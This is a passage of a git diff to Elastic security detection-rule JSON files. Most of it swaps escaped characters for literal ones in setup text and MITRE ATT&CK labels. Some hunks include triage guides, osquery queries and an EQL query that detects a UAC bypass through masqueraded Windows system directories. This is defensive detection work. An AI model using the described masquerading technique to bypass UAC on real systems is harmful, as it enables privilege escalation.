+++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_106.json 
@@ -59,7 +59,7 @@
 ],
 "risk_score": 21,
 "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json
index cf71b0f9ac6..4b640753b02 100644
--- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_107.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 21,
 "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json
index 745f6b76f33..aea5f115282 100644
--- a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_108.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 21,
 "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json
index 9f5184db2af..bfb58aeb099 100644
--- a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_100.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -62,7 +62,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json
index 8888e568535..15f5f7f91be 100644
--- a/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/2863ffeb-bf77-44dd-b7a5-93ef94b72036_101.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -61,7 +61,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json
index 4cccb8fb3e5..072a5a9097a 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json
index cb3054e59f1..d3aa6e3bfd6 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_2.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json
index f680ccf825b..022931b3baf 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_3.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json
index cc0d29c5690..a85d354c93d 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_4.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json
index 3c838455041..3aae88480b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_5.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json
index 462fa4ea99c..cd3ae332045 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_6.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json
index 8370a1398b3..8f4713f949d 100644
--- a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_7.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json
index 9eaa36bbda6..41792ef2003 100644
--- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_1.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json
index babb9933123..e3f129fc486 100644
--- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_2.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json
index de3d0c9a47f..6cc757d9fcb 100644
--- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json
index ba519b952e9..0a8063559bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json
index d4c0c044d03..45200d5f316 100644
--- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -75,7 +75,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json
index 5c47f4cfb49..695e73250ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -73,7 +73,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json
index 5f3fb9b8425..1584a215ce4 100644
--- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -73,7 +73,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json
index 939f66def08..8f23ed08f07 100644
--- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -73,7 +73,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json
index 25065456869..4390a98c022 100644
--- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" 
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json
index 1102adb0f33..a5674527868 100644
--- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the 